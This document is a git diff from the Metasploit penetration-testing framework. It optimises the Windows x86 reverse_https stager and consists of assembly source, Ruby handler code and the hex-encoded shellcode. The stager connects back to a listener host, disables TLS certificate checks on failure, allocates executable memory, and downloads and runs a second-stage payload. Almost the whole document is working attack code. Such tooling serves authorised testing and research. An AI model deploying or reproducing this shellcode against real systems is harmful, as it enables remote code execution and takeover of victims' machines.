diff --git a/external/source/shellcode/windows/x86/src/block/block_reverse_https.asm b/external/source/shellcode/windows/x86/src/block/block_reverse_https.asm index f7d4056ef8..9e81124082 100644 --- a/external/source/shellcode/windows/x86/src/block/block_reverse_https.asm +++ b/external/source/shellcode/windows/x86/src/block/block_reverse_https.asm @@ -28,7 +28,7 @@ internetopen: call ebp mov esi, eax ; save the HINTERNET handle - jmp get_server_host + jmp dbl_get_server_host internetconnect: pop ebx ; Save the hostname pointer @@ -43,7 +43,6 @@ internetconnect: push esi ; HINTERNET hInternet push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" ) call ebp - mov esi, eax ; hConnection jmp get_server_uri @@ -65,19 +64,19 @@ httpopenrequest: push edx ; version push ecx ; url push edx ; method - push esi ; hConnection + push eax ; hConnection push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" ) call ebp mov esi, eax ; hHttpRequest httpsendrequest: - xor eax, eax - push eax ; optional length - push eax ; optional - push eax ; dwHeadersLength - push eax ; headers + xor ebx, ebx + push ebx ; optional length + push ebx ; optional + push ebx ; dwHeadersLength + push ebx ; headers push esi ; hHttpRequest - push 0x7B18062D ; hash( "wininet.dll", "InternetCloseHandleA" ) + push 0x7B18062D ; hash( "wininet.dll", "HttpSendRequestA" ) call ebp test eax,eax jnz short allocate_memory @@ -88,23 +87,33 @@ check_ssl: ; but its required to use this payload without a valid signed cert. push 0x5DE2C5AA ; hash( "kernel32.dll", "GetLastError" ) call ebp - cmp eax, 12045 ; ERROR_INTERNET_INVALID_CA + cmp al, 0x0d ; ERROR_INTERNET_INVALID_CA (0x2f0d) jne failure ; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) ); set_security_options: push 0x00003380 mov eax, esp - push 4 ; sizeof(dwFlags) + push byte 4 ; sizeof(dwFlags) push eax ; &dwFlags push byte 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS) push esi ; hRequest push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" ) call ebp - pop eax ; clear temporary storage + ; pop eax ; clear temporary storage (optional) + ; Try it again jmp short httpsendrequest +dbl_get_server_host: + jmp get_server_host + +get_server_uri: + call httpopenrequest + +server_uri: + db "/12345", 0x00 + failure: push 0x56A2B5F0 ; hardcoded to exitprocess for size call ebp @@ -113,43 +122,38 @@ allocate_memory: push byte 0x40 ; PAGE_EXECUTE_READWRITE push 0x1000 ; MEM_COMMIT push 0x00400000 ; Stage allocation (8Mb ought to do us) - push byte 0 ; NULL as we dont care where the allocation is. + push ebx ; NULL as we dont care where the allocation is (zero'd from the prev function) push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" ) call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); download_prep: xchg eax, ebx ; place the allocated base address in ebx push ebx ; store a copy of the stage base address on the stack - push byte 0 ; temporary storage for bytes read count + push ebx ; temporary storage for bytes read count mov edi, esp ; &bytesRead download_more: push edi ; &bytesRead - push 8192 ; 8k read + push ebx ; buffer as the length, seems to work (Win7) push ebx ; buffer push esi ; hRequest push 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" ) call ebp - test eax,eax ; download failed? + test eax,eax ; download failed? (optional?) + jz failure mov eax, [edi] add ebx, eax ; buffer += bytes_received - test eax,eax + test eax,eax ; optional? jnz download_more ; continue until it returns 0 pop eax ; clear the temporary storage execute_stage: ret ; dive into the stored stage address -get_server_uri: - call httpopenrequest - -server_uri: - db "/123456789", 0x00 - get_server_host: call internetconnect diff --git a/lib/msf/core/handler/reverse_https.rb b/lib/msf/core/handler/reverse_https.rb index 13b92ad233..eaf6e4d425 100644 --- a/lib/msf/core/handler/reverse_https.rb +++ b/lib/msf/core/handler/reverse_https.rb @@ -39,7 +39,7 @@ module ReverseHttps [ OptString.new('LHOST', [ true, "The local listener hostname" ]), OptPort.new('LPORT', [ true, "The local listener port", 8443 ]), - OptString.new('TARGETID', [ false, "The ID of this specific payload instance", Rex::Text.rand_text_alphanumeric(8)]), + OptString.new('TARGETID', [ false, "The ID of this specific payload instance (4 bytes max)", Rex::Text.rand_text_alphanumeric(4)]), ], Msf::Handler::ReverseHttps) end diff --git a/lib/msf/core/payload/windows/reflectivedllinject.rb b/lib/msf/core/payload/windows/reflectivedllinject.rb index ca5df72de9..d5e7d11050 100644 --- a/lib/msf/core/payload/windows/reflectivedllinject.rb +++ b/lib/msf/core/payload/windows/reflectivedllinject.rb @@ -104,7 +104,7 @@ module Payload::Windows::ReflectiveDllInject i = dll.index("/123456789 HTTP/1.0\r\n\r\n\x00") if i t = target_id.to_s - raise "Target ID must be less than 9 bytes" if t.length > 8 + raise "Target ID must be less than 5 bytes" if t.length > 4 u = "/B#{t} HTTP/1.0\r\n\r\n\x00" print_status("Patching Target ID #{t} into DLL") dll[i, u.length] = u diff --git a/modules/payloads/stagers/windows/reverse_https.rb b/modules/payloads/stagers/windows/reverse_https.rb index 150617cfe7..cf592e70cf 100644 --- a/modules/payloads/stagers/windows/reverse_https.rb +++ b/modules/payloads/stagers/windows/reverse_https.rb @@ -34,34 +34,33 @@ module Metasploit3 { 'Offsets' => { - 'EXITFUNC' => [ 295, 'V' ], - 'LPORT' => [ 195, 'v' ], # Not a typo, really little endian + 'EXITFUNC' => [ 297, 'V' ], + 'LPORT' => [ 192, 'v' ], # Not a typo, really little endian }, 'Payload' => - "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + - "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + - "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + - "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" + - "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" + - "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" + - "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + - "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + - "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + - "\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x89\xE6\x54\x68\x4C\x77" + - "\x26\x07\xFF\xD5\x31\xFF\x57\x57\x57\x57\x56\x68\x3A\x56\x79\xA7" + - "\xFF\xD5\x89\xC6\xE9\xBC\x00\x00\x00\x5B\x31\xC9\x51\x51\x6A\x03" + - "\x51\x51\x68\x5C\x11\x00\x00\x53\x56\x68\x57\x89\x9F\xC6\xFF\xD5" + - "\x89\xC6\xE9\x8E\x00\x00\x00\x59\x31\xD2\x52\x68\x00\x32\xE0\x84" + - "\x52\x52\x52\x51\x52\x56\x68\xEB\x55\x2E\x3B\xFF\xD5\x89\xC6\x31" + - "\xC0\x50\x50\x50\x50\x56\x68\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75" + - "\x2C\x68\xAA\xC5\xE2\x5D\xFF\xD5\x3D\x0D\x2F\x00\x00\x75\x17\x68" + - "\x80\x33\x00\x00\x89\xE0\x6A\x04\x50\x6A\x1F\x56\x68\x75\x46\x9E" + - "\x86\xFF\xD5\x58\xEB\xC9\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x40\x68" + - "\x00\x10\x00\x00\x68\x00\x00\x40\x00\x6A\x00\x68\x58\xA4\x53\xE5" + - "\xFF\xD5\x93\x53\x6A\x00\x89\xE7\x57\x68\x00\x20\x00\x00\x53\x56" + - "\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0\x74\xCB\x8B\x07\x01\xC3\x85" + - "\xC0\x75\xE5\x58\xC3\xE8\x6D\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35" + - "\x36\x37\x38\x39\x00\xE8\x3F\xFF\xFF\xFF" +"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + +"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + +"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + +"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" + +"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" + +"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" + +"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + +"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + +"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + +"\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x89\xE6\x54\x68\x4C\x77" + +"\x26\x07\xFF\xD5\x31\xFF\x57\x57\x57\x57\x56\x68\x3A\x56\x79\xA7" + +"\xFF\xD5\x89\xC6\xEB\x64\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68" + +"\x5C\x11\x00\x00\x53\x56\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x4D\x59" + +"\x31\xD2\x52\x68\x00\x32\xE0\x84\x52\x52\x52\x51\x52\x50\x68\xEB" + +"\x55\x2E\x3B\xFF\xD5\x89\xC6\x31\xDB\x53\x53\x53\x53\x56\x68\x2D" + +"\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x36\x68\xAA\xC5\xE2\x5D\xFF\xD5" + +"\x3C\x0D\x75\x24\x68\x80\x33\x00\x00\x89\xE0\x6A\x04\x50\x6A\x1F" + +"\x56\x68\x75\x46\x9E\x86\xFF\xD5\xEB\xCD\xEB\x45\xE8\xAE\xFF\xFF" + +"\xFF\x2F\x31\x32\x33\x34\x35\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A" + +"\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x53\x68\x58\xA4\x53" + +"\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57\x53\x53\x56\x68\x12\x96\x89" + +"\xE2\xFF\xD5\x85\xC0\x74\xD1\x8B\x07\x01\xC3\x85\xC0\x75\xE9\x58" + +"\xC3\xE8\x50\xFF\xFF\xFF" } )) @@ -77,9 +76,9 @@ module Metasploit3 def generate p = super - i = p.index("/123456789\x00") + i = p.index("/12345\x00") u = "/A" + datastore['TARGETID'].to_s + "\x00" - raise ArgumentError, "TARGETID can be 8 bytes long at the most" if u.length > 11 + raise ArgumentError, "TARGETID can be 4 bytes long at the most" if u.length > 7 p[i, u.length] = u p + datastore['LHOST'].to_s + "\x00"